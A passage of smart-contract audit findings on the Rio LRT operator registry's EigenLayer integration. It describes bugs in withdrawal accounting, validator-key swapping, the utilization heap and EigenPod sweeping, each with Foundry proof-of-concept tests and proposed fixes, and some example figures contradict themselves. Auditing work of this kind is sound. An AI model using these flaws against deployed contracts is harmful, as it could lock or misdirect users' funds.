IDelegationManager.QueuedWithdrawalParams[] memory withdrawalParams = new IDelegationManager.QueuedWithdrawalParams[](1);\\n withdrawalParams[0] = IDelegationManager.QueuedWithdrawalParams({\\n strategies: strategy.toArray(),\\n shares: shares.toArray(),\\n withdrawer: withdrawer\\n });\\n // @review calls Eigen layer to queue all the balance and returns the root\\n -> root = delegationManager.queueWithdrawals(withdrawalParams)[0];\\n }\\n```\\n\\nWhich we can observe from the above snippet the EigenLayer is called for the withdrawal and then the entire function execution ends. The problem is `assetRegistry` still thinks there are 1000 * 1e18 EigenLayer shares in the operators. Also, the `withdrawalQueue` is not aware of this withdrawal request which means that users can call `requestWithdrawal` to withdraw up to 1000 * 1e18 EigenLayer shares worth LRT but in reality the 500 * 1e18 portion of it already queued in withdrawal by the owner of operator registry.\\nCoded PoC:\\n```\\nfunction test_SettingStrategyCapZero_WithdrawalsAreDoubleCountable() public {\\n IRioLRTOperatorRegistry.StrategyShareCap[] memory zeroStrategyShareCaps =\\n new IRioLRTOperatorRegistry.StrategyShareCap[](2);\\n zeroStrategyShareCaps[0] = IRioLRTOperatorRegistry.StrategyShareCap({strategy: RETH_STRATEGY, cap: 0});\\n zeroStrategyShareCaps[1] = IRioLRTOperatorRegistry.StrategyShareCap({strategy: CBETH_STRATEGY, cap: 0});\\n\\n uint8 operatorId = addOperatorDelegator(reLST.operatorRegistry, address(reLST.rewardDistributor));\\n\\n uint256 AMOUNT = 111e18;\\n\\n // Allocate to cbETH strategy.\\n cbETH.approve(address(reLST.coordinator), type(uint256).max);\\n uint256 lrtAmount = reLST.coordinator.deposit(CBETH_ADDRESS, AMOUNT);\\n\\n // Push funds into EigenLayer.\\n vm.prank(EOA, EOA);\\n reLST.coordinator.rebalance(CBETH_ADDRESS);\\n\\n vm.recordLogs();\\n reLST.operatorRegistry.setOperatorStrategyShareCaps(operatorId, zeroStrategyShareCaps);\\n\\n Vm.Log[] memory entries = vm.getRecordedLogs();\\n assertGt(entries.length, 0);\\n\\n for (uint256 i = 0; i < entries.length; i++) {\\n if (entries[i].topics[0] == keccak256('OperatorStrategyExitQueued(uint8,address,uint256,bytes32)')) {\\n uint8 emittedOperatorId = abi.decode(abi.encodePacked(entries[i].topics[1]), (uint8));\\n (address strategy, uint256 sharesToExit, bytes32 withdrawalRoot) =\\n abi.decode(entries[i].data, (address, uint256, bytes32));\\n\\n assertEq(emittedOperatorId, operatorId);\\n assertEq(strategy, CBETH_STRATEGY);\\n assertEq(sharesToExit, AMOUNT);\\n assertNotEq(withdrawalRoot, bytes32(0));\\n\\n break;\\n }\\n if (i == entries.length - 1) fail('Event not found');\\n }\\n\\n // @review add these\\n // @review all the eigen layer shares are already queued as we checked above, now user requestWithdrawal\\n // of the same amount of EigenLayer share worth of LRT which there will be double counting when epoch is settled.\\n uint256 queuedShares = reLST.coordinator.requestWithdrawal(address(cbETH), lrtAmount);\\n console.log(\"Queued shares\", queuedShares);\\n }\\n```\\nчUpdate the withdrawal queue when the operator registry admin changes the EigenLayer shares amount by either removing an operator or setting its strategy cap to \"0\".чHigh, because the users withdrawals will never go through in rebalancing because of double counting of the same share withdrawals.ч```\\nfunction setOperatorStrategyCap(\\n RioLRTOperatorRegistryStorageV1.StorageV1 storage s,\\n uint8 operatorId,\\n IRioLRTOperatorRegistry.StrategyShareCap memory newShareCap\\n ) internal {\\n . \\n // @review this \"if\" will be executed\\n -> if (currentShareDetails.cap > 0 && newShareCap.cap == 0) {\\n // If the operator has allocations, queue them for exit.\\n if (currentShareDetails.allocation > 0) {\\n -> operatorDetails.queueOperatorStrategyExit(operatorId, newShareCap.strategy);\\n }\\n // Remove the operator from the utilization heap.\\n utilizationHeap.removeByID(operatorId);\\n } else if (currentShareDetails.cap == 0 && newShareCap.cap > 0) {\\n // If the current cap is 0 and the new cap is greater than 0, insert the operator into the heap.\\n utilizationHeap.insert(OperatorUtilizationHeap.Operator(operatorId, 0));\\n } else {\\n // Otherwise, update the operator's utilization in the heap.\\n utilizationHeap.updateUtilizationByID(operatorId, currentShareDetails.allocation.divWad(newShareCap.cap));\\n }\\n .\\n }\\n```\\n -swapValidatorDetails incorrectly writes keys to memory, resulting in permanently locked beacon chain depositsчhighчWhen loading BLS public keys from storage to memory, the keys are partly overwritten with zero bytes. This ultimately causes allocations of these malformed public keys to permanently lock deposited ETH in the beacon chain deposit contract.\\nValidatorDetails.swapValidatorDetails is used by RioLRTOperatorRegistry.reportOutOfOrderValidatorExits to swap the details in storage of validators which have been exited out of order:\\n```\\n// Swap the position of the validators starting from the `fromIndex` with the validators that were next in line to be exited.\\nVALIDATOR_DETAILS_POSITION.swapValidatorDetails(operatorId, fromIndex, validators.exited, validatorCount);\\n```\\n\\nIn swapValidatorDetails, for each swap to occur, we load two keys into memory from storage:\\n```\\nkeyOffset1 = position.computeStorageKeyOffset(operatorId, startIndex1);\\nkeyOffset2 = position.computeStorageKeyOffset(operatorId, startIndex2);\\nassembly {\\n // Load key1 into memory\\n let _part1 := sload(keyOffset1) // Load bytes 0..31\\n let _part2 := sload(add(keyOffset1, 1)) // Load bytes 32..47\\n mstore(add(key1, 0x20), _part1) // Store bytes 0..31\\n mstore(add(key1, 0x30), shr(128, _part2)) // Store bytes 16..47\\n\\n isEmpty := iszero(or(_part1, _part2)) // Store if key1 is empty\\n\\n // Load key2 into memory\\n _part1 := sload(keyOffset2) // Load bytes 0..31\\n _part2 := sload(add(keyOffset2, 1)) // Load bytes 32..47\\n mstore(add(key2, 0x20), _part1) // Store bytes 0..31\\n mstore(add(key2, 0x30), shr(128, _part2)) // Store bytes 16..47\\n\\n isEmpty := or(isEmpty, iszero(or(_part1, _part2))) // Store if key1 or key2 is empty\\n}\\n```\\n\\nThe problem here is that when we store the keys in memory, they don't end up as intended. Let's look at how it works to see where it goes wrong.\\nThe keys used here are BLS public keys, with a length of 48 bytes, e.g.: `0x95cfcb859956953f9834f8b14cdaa939e472a2b5d0471addbe490b97ed99c6eb8af94bc3ba4d4bfa93d087d522e4b78d`. As such, previously to entering this for loop, we initialize key1 and key2 in memory as 48 byte arrays:\\n```\\nbytes memory key1 = new bytes(48);\\nbytes memory key2 = new bytes(48);\\n```\\n\\nSince they're longer than 32 bytes, they have to be stored in two separate storage slots, thus we do two sloads per key to retrieve `_part1` and `_part2`, containing the first 32 bytes and the last 16 bytes respectively.\\nThe following lines are used with the intention of storing the key in two separate memory slots, similarly to how they're stored in storage:\\n```\\nmstore(add(key1, 0x20), _part1) // Store bytes 0..31\\nmstore(add(key1, 0x30), shr(128, _part2)) // Store bytes 16..47\\n```\\n\\nThe problem however is that the second mstore shifts `_part2` 128 bits to the right, causing the leftmost 128 bits to zeroed. Since this mstore is applied only 16 (0x10) bytes after the first mstore, we overwrite bytes 16..31 with zero bytes. We can test this in chisel to prove it:\\nUsing this example key: `0x95cfcb859956953f9834f8b14cdaa939e472a2b5d0471addbe490b97ed99c6eb8af94bc3ba4d4bfa93d087d522e4b78d`\\nWe assign the first 32 bytes to _part1:\\n```\\nbytes32 _part1 = 0x95cfcb859956953f9834f8b14cdaa939e472a2b5d0471addbe490b97ed99c6eb\\n```\\n\\nWe assign the last 16 bytes to _part2:\\n```\\nbytes32 _part2 = bytes32(bytes16(0x8af94bc3ba4d4bfa93d087d522e4b78d))\\n```\\n\\nWe assign 48 bytes in memory for key1:\\n```\\nbytes memory key1 = new bytes(48);\\n```\\n\\nAnd we run the following snippet from swapValidatorDetails in chisel:\\n```\\nassembly {\\n mstore(add(key1, 0x20), _part1) // Store bytes 0..31\\n mstore(add(key1, 0x30), shr(128, _part2)) // Store bytes 16..47\\n}\\n```\\n\\nNow we can check the resulting memory using `!memdump`, which outputs the following:\\n```\\n➜ !memdump\\n[0x00:0x20]: 0x0000000000000000000000000000000000000000000000000000000000000000\\n[0x20:0x40]: 0x0000000000000000000000000000000000000000000000000000000000000000\\n[0x40:0x60]: 0x00000000000000000000000000000000000000000000000000000000000000e0\\n[0x60:0x80]: 0x0000000000000000000000000000000000000000000000000000000000000000\\n[0x80:0xa0]: 0x0000000000000000000000000000000000000000000000000000000000000030\\n[0xa0:0xc0]: 0x95cfcb859956953f9834f8b14cdaa93900000000000000000000000000000000\\n[0xc0:0xe0]: 0x8af94bc3ba4d4bfa93d087d522e4b78d00000000000000000000000000000000\\n```\\n\\nWe can see from the memory that at the free memory pointer, the length of key1 is defined 48 bytes (0x30), and following it is the resulting key with 16 bytes zeroed in the middle of the key.чWe can solve this by simply mstoring `_part2` prior to mstoring `_part1`, allowing the mstore of `_part1` to overwrite the zero bytes from _part2:\\n```\\nmstore(add(key1, 0x30), shr(128, _part2)) // Store bytes 16..47\\nmstore(add(key1, 0x20), _part1) // Store bytes 0..31\\n```\\n\\nNote that the above change must be made for both keys.чWhenever we swapValidatorDetails using reportOutOfOrderValidatorExits, both sets of validators will have broken public keys and when allocated to will cause ETH to be permanently locked in the beacon deposit contract.\\nWe can see how this manifests in allocateETHDeposits where we retrieve the public keys for allocations:\\n```\\n// Load the allocated validator details from storage and update the deposited validator count.\\n(pubKeyBatch, signatureBatch) = ValidatorDetails.allocateMemory(newDepositAllocation);\\nVALIDATOR_DETAILS_POSITION.loadValidatorDetails(\\n operatorId, validators.deposited, newDepositAllocation, pubKeyBatch, signatureBatch, 0\\n);\\n// rest of code\\nallocations[allocationIndex] = OperatorETHAllocation(operator.delegator, newDepositAllocation, pubKeyBatch, signatureBatch);\\n```\\n\\nWe then use the public keys to stakeETH:\\n```\\n(uint256 depositsAllocated, IRioLRTOperatorRegistry.OperatorETHAllocation[] memory allocations) = operatorRegistry.allocateETHDeposits(\\n depositCount\\n);\\ndepositAmount = depositsAllocated * ETH_DEPOSIT_SIZE;\\n\\nfor (uint256 i = 0; i < allocations.length; ++i) {\\n uint256 deposits = allocations[i].deposits;\\n\\n IRioLRTOperatorDelegator(allocations[i].delegator).stakeETH{value: deposits * ETH_DEPOSIT_SIZE}(\\n deposits, allocations[i].pubKeyBatch, allocations[i].signatureBatch\\n );\\n}\\n```\\n\\nUltimately for each allocation, the public key is passed to the beacon DepositContract.deposit where it deposits to a public key for which we don't have the associated private key and thus can never withdraw.ч```\\n// Swap the position of the validators starting from the `fromIndex` with the validators that were next in line to be exited.\\nVALIDATOR_DETAILS_POSITION.swapValidatorDetails(operatorId, fromIndex, validators.exited, validatorCount);\\n```\\n -`reportOutOfOrderValidatorExits` does not updates the heap orderчhighчWhen an operator's validator exits without a withdrawal request, the owner can invoke the `reportOutOfOrderValidatorExits` function to increase the `exited` portion of the operator validators. However, this action does not update the heap. Consequently, during subsequent allocation or deallocation processes, the heap may incorrectly mark validators as `exited`.\\nFirst, let's see how the utilization is determined for native ETH deposits for operators which is calculated as: `operatorShares.allocation.divWad(operatorShares.cap)` where as the allocation is the total `deposited` validators and the `cap` is predetermined value by the owner of the registry.\\nWhen the heap is retrieved from the storage, here how it is fetched:\\n```\\nfunction getOperatorUtilizationHeapForETH(RioLRTOperatorRegistryStorageV1.StorageV1 storage s)\\n internal\\n view\\n returns (OperatorUtilizationHeap.Data memory heap)\\n {\\n uint8 numActiveOperators = s.activeOperatorCount;\\n if (numActiveOperators == 0) return OperatorUtilizationHeap.Data(new OperatorUtilizationHeap.Operator[](0), 0);\\n\\n heap = OperatorUtilizationHeap.initialize(MAX_ACTIVE_OPERATOR_COUNT);\\n\\n uint256 activeDeposits;\\n IRioLRTOperatorRegistry.OperatorValidatorDetails memory validators;\\n unchecked {\\n uint8 i;\\n for (i = 0; i < numActiveOperators; ++i) {\\n uint8 operatorId = s.activeOperatorsByETHDepositUtilization.get(i);\\n\\n // Non-existent operator ID. We've reached the end of the heap.\\n if (operatorId == 0) break;\\n\\n validators = s.operatorDetails[operatorId].validatorDetails;\\n activeDeposits = validators.deposited - validators.exited;\\n heap.operators[i + 1] = OperatorUtilizationHeap.Operator({\\n id: operatorId,\\n utilization: activeDeposits.divWad(validators.cap)\\n });\\n }\\n heap.count = i;\\n }\\n }\\n```\\n\\nas we can see, the heap is always assumed to be order in the storage when the registry fetches it initially. There are no ordering of the heap when requesting the heap initially.\\nWhen, say the deallocation happens via an user withdrawal request, the queue can exit early if the operator in the heap has \"0\" room:\\n```\\n function deallocateETHDeposits(uint256 depositsToDeallocate) external onlyCoordinator returns (uint256 depositsDeallocated, OperatorETHDeallocation[] memory deallocations) {\\n deallocations = new OperatorETHDeallocation[](s.activeOperatorCount);\\n\\n\\n OperatorUtilizationHeap.Data memory heap = s.getOperatorUtilizationHeapForETH();\\n if (heap.isEmpty()) revert NO_AVAILABLE_OPERATORS_FOR_DEALLOCATION();\\n\\n\\n uint256 deallocationIndex;\\n uint256 remainingDeposits = depositsToDeallocate;\\n\\n\\n bytes memory pubKeyBatch;\\n while (remainingDeposits > 0) {\\n uint8 operatorId = heap.getMax().id;\\n\\n\\n OperatorDetails storage operator = s.operatorDetails[operatorId];\\n OperatorValidatorDetails memory validators = operator.validatorDetails;\\n -> uint256 activeDeposits = validators.deposited - validators.exited;\\n\\n\\n // Exit early if the operator with the highest utilization rate has no active deposits,\\n // as no further deallocations can be made.\\n -> if (activeDeposits == 0) break;\\n .\\n }\\n .\\n }\\n```\\n\\n`reportOutOfOrderValidatorExits` increases the \"exited\" part of the operators validator:\\n```\\nfunction reportOutOfOrderValidatorExits(uint8 operatorId, uint256 fromIndex, uint256 validatorCount) external {\\n .\\n .\\n // Swap the position of the validators starting from the `fromIndex` with the validators that were next in line to be exited.\\n VALIDATOR_DETAILS_POSITION.swapValidatorDetails(operatorId, fromIndex, validators.exited, validatorCount);\\n -> operator.validatorDetails.exited += uint40(validatorCount);\\n\\n emit OperatorOutOfOrderValidatorExitsReported(operatorId, validatorCount);\\n }\\n```\\n\\nNow, knowing all these above, let's do an example where calling `reportOutOfOrderValidatorExits` can make the heap work wrongly and exit prematurely.\\nAssume there are 3 operators which has native ETH deposits. operatorId 1 -> utilization 5% operatorId 2 -> utilization 10% operatorId 3 -> utilization 15%\\nsuch operators would be ordered in the heap as: heap.operators[1] -> operatorId: 1, utilization: 5 heap.operators[2] -> operatorId: 2, utilization: 10 heap.operators[3] -> operatorId: 3, utilization: 15 heap.getMin() -> operatorId: 1, utilization: 5 heap.getMax() -> operatorId:3, utilization 15\\nnow, let's say the \"cap\" is 100 for all of the operators which means that: operatorId 1 -> validator.deposits = 5, validator.exit = 0 operatorId 2 -> validator.deposits = 10, validator.exit = 0 operatorId 3 -> validator.deposits = 15, validator.exit = 0\\nLet's assume that the operator 3 exits 15 validator from beacon chain without prior to a user request, which is a reason for owner to call `reportOutOfOrderValidatorExits` to increase the exited validators.\\nWhen the owner calls `reportOutOfOrderValidatorExits` for the operatorId 3, the exited will be 15 for the operatorId 3. After the call the operators validator balances will be: operatorId 1 -> validator.deposits = 5, validator.exit = 0 operatorId 2 -> validator.deposits = 10, validator.exit = 8 operatorId 3 -> validator.deposits = 15, validator.exit = 15\\nhence, the utilizations will be: operatorId 1 -> utilization 5% operatorId 2 -> utilization 10% operatorId 3 -> utilization 0%\\nwhich means now the operatorId 3 has the lowest utilization and should be the first to get deposits and last to unwind deposits from. However, the heap is not re-ordered meaning that the minimum in the heap is still opeartorId 1 and the maximum is still operatorId 3!\\nNow, when a user tries to withdraw, the first deallocation target will be the operatorId 3 because the heap thinks that it is the most utilized still.\\nHence, the user will not be able to request the withdrawal!\\nCoded PoC:\\n```\\n// forge test --match-contract OperatorUtilizationHeapTest --match-test test_RemovingValidatorMessesTheHeap -vv\\n function test_RemovingValidatorMessesTheHeap() public {\\n OperatorUtilizationHeap.Data memory heap = OperatorUtilizationHeap.initialize(5);\\n\\n // @review initialize and order 3 operators \\n heap.insert(OperatorUtilizationHeap.Operator({id: 1, utilization: 5}));\\n heap.store(heapStore);\\n\\n heap.insert(OperatorUtilizationHeap.Operator({id: 2, utilization: 10}));\\n heap.store(heapStore);\\n\\n heap.insert(OperatorUtilizationHeap.Operator({id: 3, utilization: 15}));\\n heap.store(heapStore);\\n\\n // @review mimick how the heap can be fetched from the storage initially\\n uint8 numActiveOperators = 3;\\n OperatorUtilizationHeap.Data memory newHeap = OperatorUtilizationHeap.initialize(64);\\n uint8 i;\\n for (i = 0; i < numActiveOperators; ++i) {\\n uint8 operatorId = heapStore.get(i);\\n if (operatorId == 0) break;\\n\\n newHeap.operators[i+1] = OperatorUtilizationHeap.Operator({\\n id: operatorId,\\n utilization: heap.operators[operatorId].utilization\\n });\\n }\\n newHeap.count = i;\\n\\n // @review assume the reportValidatorAndExits called, and now the utilization is \"0\"\\n heap.updateUtilizationByID(3, 0);\\n // @review this should be done, but the heap is not stored! \\n // heap.store(heapStore);\\n\\n console.log(\"1st\", heap.operators[1].id);\\n console.log(\"2nd\", heap.operators[2].id);\\n console.log(\"3rd\", heap.operators[3].id);\\n console.log(\"origin heaps min\", heap.getMin().id);\\n console.log(\"origin heaps max\", heap.getMax().id);\\n\\n console.log(\"1st\", newHeap.operators[1].id);\\n console.log(\"2nd\", newHeap.operators[2].id);\\n console.log(\"3rd\", newHeap.operators[3].id);\\n console.log(\"new heaps min\", newHeap.getMin().id);\\n console.log(\"new heaps max\", newHeap.getMax().id);\\n\\n // @review mins and maxs are mixed\\n assertEq(newHeap.getMin().id, 1);\\n assertEq(heap.getMin().id, 3);\\n assertEq(heap.getMax().id, 2);\\n assertEq(newHeap.getMax().id, 3);\\n }\\n```\\nчupdate the utilization in the reportOutOfOrderValidatorExits functionчHeap can be mixed, withdrawals and deposits can fail, hence I will label this as high.ч```\\nfunction getOperatorUtilizationHeapForETH(RioLRTOperatorRegistryStorageV1.StorageV1 storage s)\\n internal\\n view\\n returns (OperatorUtilizationHeap.Data memory heap)\\n {\\n uint8 numActiveOperators = s.activeOperatorCount;\\n if (numActiveOperators == 0) return OperatorUtilizationHeap.Data(new OperatorUtilizationHeap.Operator[](0), 0);\\n\\n heap = OperatorUtilizationHeap.initialize(MAX_ACTIVE_OPERATOR_COUNT);\\n\\n uint256 activeDeposits;\\n IRioLRTOperatorRegistry.OperatorValidatorDetails memory validators;\\n unchecked {\\n uint8 i;\\n for (i = 0; i < numActiveOperators; ++i) {\\n uint8 operatorId = s.activeOperatorsByETHDepositUtilization.get(i);\\n\\n // Non-existent operator ID. We've reached the end of the heap.\\n if (operatorId == 0) break;\\n\\n validators = s.operatorDetails[operatorId].validatorDetails;\\n activeDeposits = validators.deposited - validators.exited;\\n heap.operators[i + 1] = OperatorUtilizationHeap.Operator({\\n id: operatorId,\\n utilization: activeDeposits.divWad(validators.cap)\\n });\\n }\\n heap.count = i;\\n }\\n }\\n```\\n -Heap is incorrectly stores the removed operator ID which can lead to division by zero in deposit/withdrawal flowчhighчAn operator's strategy can be reset by the owner calling `setOperatorStrategyCaps` to \"0\". This action sets the utilization to \"0\" and removes the operator from the heap. Consequently, this means that the operator has unwound all its strategy shares and can no longer receive any more deposits. However, due to how the heap is organized, if an operator who had funds before is reset to \"0\", the heap will not successfully remove the operator. As a result, when ordering the heap, a division by \"0\" will occur, causing the transaction to revert on deposits and withdrawals indefinitely.\\nIn order to break down the issue, let's divide the issue to 2 parts which their combination is the issue itself\\n1- Heap is not removing the removed ID from the heaps storage when the operator is removed\\nWhen the operator is removed, the operator will be removed from the heap as follows:\\n```\\nfunction setOperatorStrategyCap(\\n RioLRTOperatorRegistryStorageV1.StorageV1 storage s,\\n uint8 operatorId,\\n IRioLRTOperatorRegistry.StrategyShareCap memory newShareCap\\n ) internal {\\n .\\n OperatorUtilizationHeap.Data memory utilizationHeap = s.getOperatorUtilizationHeapForStrategy(newShareCap.strategy);\\n // If the current cap is greater than 0 and the new cap is 0, remove the operator from the strategy.\\n if (currentShareDetails.cap > 0 && newShareCap.cap == 0) {\\n // If the operator has allocations, queue them for exit.\\n if (currentShareDetails.allocation > 0) {\\n operatorDetails.queueOperatorStrategyExit(operatorId, newShareCap.strategy);\\n }\\n // Remove the operator from the utilization heap.\\n -> utilizationHeap.removeByID(operatorId);\\n }\\n .\\n\\n // Persist the updated heap to the active operators tracking.\\n -> utilizationHeap.store(s.activeOperatorsByStrategyShareUtilization[newShareCap.strategy]);\\n .\\n }\\n```\\n\\n`removeByID` calls the internal `_remove` function which is NOT removes the last element! `self.count` is decreased however, the index is still the previous value of the `self.count`\\n```\\nfunction _remove(Data memory self, uint8 i) internal pure {\\n self.operators[i] = self.operators[self.count--];\\n }\\n```\\n\\nFor example, if there are 3 operators as follows: operatorId: 1, utilization: 50% operatorId: 2, utilization: 60% operatorId: 3, utilization: 70% then, the `heap.count` would be 3 and the order would be: 1, 2, 3 in the heap heap.operators[1] = operatorId 1 heap.operators[2] = operatorId 2 heap.operators[3] = operatorId 3\\nif we remove the operator Id 2: `heap.count` = 2 order: 1,3 heap.operators[1] = operatorId 1 heap.operators[2] = operatorId 2 heap.operators[3] = operatorId 0 THIS SHOULD BE \"0\" since its removed but it is \"3\" in the current implementation!\\nAs shown here, the operators[3] should be \"0\" since there isn't any operator3 in the heap anymore but the heap keeps the value and not resets it.\\nHere a test shows the above issue:\\n```\\n// forge test --match-contract OperatorUtilizationHeapTest --match-test test_removingDoesNotUpdatesStoredHeap -vv\\n function test_removingDoesNotUpdatesStoredHeap() public {\\n OperatorUtilizationHeap.Data memory heap = OperatorUtilizationHeap.initialize(5);\\n\\n heap.insert(OperatorUtilizationHeap.Operator({id: 1, utilization: 50}));\\n heap.store(heapStore);\\n\\n heap.insert(OperatorUtilizationHeap.Operator({id: 2, utilization: 60}));\\n heap.store(heapStore);\\n\\n heap.insert(OperatorUtilizationHeap.Operator({id: 3, utilization: 70}));\\n heap.store(heapStore);\\n\\n console.log(\"Heaps count\", heap.count);\\n console.log(\"1st\", heap.operators[1].id);\\n console.log(\"2nd\", heap.operators[2].id);\\n console.log(\"3rd\", heap.operators[3].id);\\n\\n // remove 2\\n heap.removeByID(3);\\n heap.store(heapStore);\\n\\n console.log(\"Heaps count\", heap.count);\\n console.log(\"1st\", heap.operators[1].id);\\n console.log(\"2nd\", heap.operators[2].id);\\n console.log(\"3rd\", heap.operators[3].id);\\n }\\n```\\n\\nLogs:\\n2- When the operator cap is reseted the allocations/deallocations will not work due to above heap issue because of division by zero\\nNow, take the above example, we removed the operatorId 3 from the heap by setting its cap to \"0\". Now, there are only operators 1 and 2 active for that specific strategy. When there are idle funds in the deposit pool before the rebalance call, the excess funds that are not requested as withdrawals will be pushed to EigenLayer as follows:\\n```\\nfunction rebalance(address asset) external checkRebalanceDelayMet(asset) {\\n .\\n .\\n -> (uint256 sharesReceived, bool isDepositCapped) = depositPool().depositBalanceIntoEigenLayer(asset);\\n .\\n }\\n```\\n\\n```\\n function depositBalanceIntoEigenLayer(address asset) external onlyCoordinator returns (uint256, bool) {\\n uint256 amountToDeposit = asset.getSelfBalance();\\n if (amountToDeposit == 0) return (0, false);\\n .\\n .\\n -> return (OperatorOperations.depositTokenToOperators(operatorRegistry(), asset, strategy, sharesToAllocate), isDepositCapped);\\n }\\n```\\n\\n```\\nfunction depositTokenToOperators(\\n IRioLRTOperatorRegistry operatorRegistry,\\n address token,\\n address strategy,\\n uint256 sharesToAllocate\\n ) internal returns (uint256 sharesReceived) {\\n -> (uint256 sharesAllocated, IRioLRTOperatorRegistry.OperatorStrategyAllocation[] memory allocations) = operatorRegistry.allocateStrategyShares(\\n strategy, sharesToAllocate\\n );\\n .\\n .\\n }\\n```\\n\\n```\\nfunction allocateStrategyShares(address strategy, uint256 sharesToAllocate) external onlyDepositPool returns (uint256 sharesAllocated, OperatorStrategyAllocation[] memory allocations) {\\n -> OperatorUtilizationHeap.Data memory heap = s.getOperatorUtilizationHeapForStrategy(strategy);\\n .\\n .\\n .\\n .\\n }\\n```\\n\\n```\\nfunction getOperatorUtilizationHeapForStrategy(RioLRTOperatorRegistryStorageV1.StorageV1 storage s, address strategy) internal view returns (OperatorUtilizationHeap.Data memory heap) {\\n uint8 numActiveOperators = s.activeOperatorCount;\\n if (numActiveOperators == 0) return OperatorUtilizationHeap.Data(new OperatorUtilizationHeap.Operator[](0), 0);\\n \\n heap = OperatorUtilizationHeap.initialize(MAX_ACTIVE_OPERATOR_COUNT);\\n LibMap.Uint8Map storage operators = s.activeOperatorsByStrategyShareUtilization[strategy];\\n\\n IRioLRTOperatorRegistry.OperatorShareDetails memory operatorShares;\\n unchecked {\\n uint8 i;\\n for (i = 0; i < numActiveOperators; ++i) {\\n uint8 operatorId = operators.get(i);\\n\\n // Non-existent operator ID. We've reached the end of the heap.\\n if (operatorId == 0) break;\\n\\n operatorShares = s.operatorDetails[operatorId].shareDetails[strategy];\\n heap.operators[i + 1] = OperatorUtilizationHeap.Operator({\\n id: operatorId,\\n -> utilization: operatorShares.allocation.divWad(operatorShares.cap)\\n });\\n }\\n heap.count = i;\\n }\\n }\\n```\\n\\nAs we can see in one above code snippet, the `numActiveOperators` is 3. Since the stored heaps last element is not set to \"0\" it will point to operatorId 3 which has a cap of \"0\" after the removal. This will make the\\n```\\nutilization: operatorShares.allocation.divWad(operatorShares.cap)\\n```\\n\\npart of the code to perform a division by zero and the function will revert.\\nCoded PoC:\\n```\\n// forge test --match-contract RioLRTOperatorRegistryTest --match-test test_Capped0ValidatorBricksFlow -vv\\n function test_Capped0ValidatorBricksFlow() public {\\n // Add 3 operators\\n addOperatorDelegators(reLST.operatorRegistry, address(reLST.rewardDistributor), 3);\\n\\n // The caps for each operator is 1000e18, we will delete the id 2 so we need funds there\\n // any number that is more than 1000 should be ok for that experiement \\n uint256 AMOUNT = 1002e18;\\n\\n // Allocate to cbETH strategy.\\n cbETH.approve(address(reLST.coordinator), type(uint256).max);\\n uint256 lrtAmount = reLST.coordinator.deposit(CBETH_ADDRESS, AMOUNT);\\n\\n // Push funds into EigenLayer.\\n vm.prank(EOA, EOA);\\n reLST.coordinator.rebalance(CBETH_ADDRESS);\\n\\n // Build the empty caps\\n IRioLRTOperatorRegistry.StrategyShareCap[] memory zeroStrategyShareCaps =\\n new IRioLRTOperatorRegistry.StrategyShareCap[](1);\\n zeroStrategyShareCaps[0] = IRioLRTOperatorRegistry.StrategyShareCap({strategy: CBETH_STRATEGY, cap: 0});\\n\\n // Set the caps of CBETH_STRATEGY for operator 2 as \"0\"\\n reLST.operatorRegistry.setOperatorStrategyShareCaps(2, zeroStrategyShareCaps);\\n\\n // Try an another deposit, we expect revert when we do the rebalance\\n reLST.coordinator.deposit(CBETH_ADDRESS, 10e18);\\n\\n // Push funds into EigenLayer. Expect revert, due to division by \"0\"\\n skip(reETH.coordinator.rebalanceDelay());\\n vm.startPrank(EOA, EOA);\\n vm.expectRevert(bytes4(keccak256(\"DivWadFailed()\")));\\n reLST.coordinator.rebalance(CBETH_ADDRESS);\\n vm.stopPrank();\\n }\\n```\\nчWhen removing from the heap also remove the last element from the heap.\\nI am not sure of this, but this might work\\n```\\nfunction _remove(Data memory self, uint8 i) internal pure {\\n self.operators[i] = self.operators[--self.count];\\n }\\n```\\nчCore logic broken, withdrawal/deposits can not be performed.ч```\\nfunction setOperatorStrategyCap(\\n RioLRTOperatorRegistryStorageV1.StorageV1 storage s,\\n uint8 operatorId,\\n IRioLRTOperatorRegistry.StrategyShareCap memory newShareCap\\n ) internal {\\n .\\n OperatorUtilizationHeap.Data memory utilizationHeap = s.getOperatorUtilizationHeapForStrategy(newShareCap.strategy);\\n // If the current cap is greater than 0 and the new cap is 0, remove the operator from the strategy.\\n if (currentShareDetails.cap > 0 && newShareCap.cap == 0) {\\n // If the operator has allocations, queue them for exit.\\n if (currentShareDetails.allocation > 0) {\\n operatorDetails.queueOperatorStrategyExit(operatorId, newShareCap.strategy);\\n }\\n // Remove the operator from the utilization heap.\\n -> utilizationHeap.removeByID(operatorId);\\n }\\n .\\n\\n // Persist the updated heap to the active operators tracking.\\n -> utilizationHeap.store(s.activeOperatorsByStrategyShareUtilization[newShareCap.strategy]);\\n .\\n }\\n```\\n -Ether can stuck when an operators validators are removed due to an user front-runningчmediumчWhen a full withdrawal occurs in the EigenPod, the excess amount can remain idle within the EigenPod and can only be swept by calling a function in the delegator contract of a specific operator. However, in cases where the owner removes all validators for emergencies or any other reason, a user can frontrun the transaction, willingly or not, causing the excess ETH to become stuck in the EigenPod. The only way to recover the ether would be for the owner to reactivate the validators, which may not be intended since the owner initially wanted to remove all the validators and now needs to add them again.\\nLet's assume a Layered Relay Token (LRT) with a beacon chain strategy and only two operators for simplicity. Each operator is assigned two validators, allowing each operator to stake 64 ETH in the PoS staking via the EigenPod.\\nThis function triggers a full withdrawal from the operator's delegator EigenPod. The `queueOperatorStrategyExit` function will withdraw the entire validator balance as follows:\\n```\\nif (validatorDetails.cap > 0 && newValidatorCap == 0) {\\n // If there are active deposits, queue the operator for strategy exit.\\n if (activeDeposits > 0) {\\n -> operatorDetails.queueOperatorStrategyExit(operatorId, BEACON_CHAIN_STRATEGY);\\n .\\n }\\n .\\n } else if (validatorDetails.cap == 0 && newValidatorCap > 0) {\\n .\\n } else {\\n .\\n }\\n```\\n\\n`operatorDetails.queueOperatorStrategyExit` function will full withdraw the entire validator balance as follows:\\n```\\nfunction queueOperatorStrategyExit(IRioLRTOperatorRegistry.OperatorDetails storage operator, uint8 operatorId, address strategy) internal {\\n IRioLRTOperatorDelegator delegator = IRioLRTOperatorDelegator(operator.delegator);\\n\\n uint256 sharesToExit;\\n if (strategy == BEACON_CHAIN_STRATEGY) {\\n // Queues an exit for verified validators only. Unverified validators must by exited once verified,\\n // and ETH must be scraped into the deposit pool. Exits are rounded to the nearest Gwei. It is not\\n // possible to exit ETH with precision less than 1 Gwei. We do not populate `sharesToExit` if the\\n // Eigen Pod shares are not greater than 0.\\n int256 eigenPodShares = delegator.getEigenPodShares();\\n if (eigenPodShares > 0) {\\n sharesToExit 